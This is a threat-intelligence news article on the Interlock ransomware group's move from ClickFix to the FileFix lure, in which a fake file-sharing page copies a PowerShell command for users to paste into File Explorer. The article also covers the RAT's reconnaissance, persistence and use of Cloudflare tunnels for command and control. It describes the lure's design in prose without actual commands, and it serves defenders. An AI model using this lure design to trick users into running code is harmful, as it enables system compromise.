The Interlock ransomware group has significantly evolved its malware distribution strategy by implementing the innovative FileFix technique, marking a concerning advancement in social engineering attacks. This sophisticated method represents a dangerous evolution from traditional ClickFix campaigns, designed to deceive users into voluntarily infecting their systems with remote access trojans (RATs).
The Rise of ClickFix: Setting the Stage for FileFix
To understand the significance of FileFix, it’s essential to examine its predecessor. According to ESET security researchers, ClickFix attacks increased by 517% between the second half of 2024 and the first half of 2025, establishing it as a preferred initial access vector among cybercriminals. These attacks typically lure victims to fraudulent websites where they’re tricked into copying and executing malicious PowerShell commands.
Traditional ClickFix campaigns exploit user trust by presenting fake error messages claiming browser display issues or requiring CAPTCHA verification. While initially targeting Windows users, security experts have documented campaigns expanding to macOS and Linux environments, demonstrating the technique’s cross-platform adaptability.
FileFix Technique: A More Deceptive Approach
The FileFix technique, recently documented by cybersecurity expert mr.d0x, represents a sophisticated refinement of social engineering tactics. Unlike ClickFix’s reliance on command-line interfaces that may raise user suspicion, FileFix exploits the familiar Windows File Explorer interface, significantly reducing victim wariness.
The attack mechanism involves presenting users with a malicious webpage claiming to share a specific file. Victims are instructed to copy a provided path and paste it into File Explorer to locate the file. The fraudulent page may include an “Open Explorer” button that simultaneously launches File Explorer and copies a PowerShell command to the clipboard. When users paste the path and press Enter, the malicious command executes automatically.
Interlock RAT Distribution Through Advanced Infrastructure
Security researchers from The DFIR Report and Proofpoint identified Interlock RAT distribution through KongTuke (LandUpdate808), a sophisticated Traffic Distribution System (TDS), as early as May 2025. This multi-stage process initially employed ClickFix and fake CAPTCHA mechanisms for malware delivery.
By June, the threat actors transitioned to FileFix implementation, distributing a PHP variant of Interlock RAT. Some campaigns also deploy Node.js versions of the malware, marking the first publicly documented real-world application of FileFix tactics in active cyber campaigns.
Interlock RAT Capabilities and Operational Behavior
Upon successful execution, the remote access trojan conducts comprehensive system reconnaissance using PowerShell commands to gather and transmit data to operators. The malware performs privilege escalation checks and establishes persistence mechanisms while awaiting further instructions from command and control servers.
Analysis reveals that attackers operate the malware manually, conducting backup verification, local directory navigation, and domain controller reconnaissance. In several documented cases, threat actors utilized RDP for lateral movement within compromised environments, indicating sophisticated post-exploitation capabilities.
Legitimate Services Exploitation for Stealth Operations
Notably, Interlock RAT exploits trycloudflare.com as its command and control infrastructure, abusing legitimate Cloudflare Tunnel services to mask malicious activities. This approach enables attackers to circumvent traditional detection and blocking mechanisms employed by security solutions.
The emergence of FileFix demonstrates the continuous evolution of social engineering methodologies within cybercriminal arsenals. Organizations must prioritize comprehensive cybersecurity training programs, particularly focusing on suspicious webpage recognition and system command execution requests. Implementing multi-layered security architectures and maintaining current threat detection capabilities remain critical defensive measures against these sophisticated attack vectors.
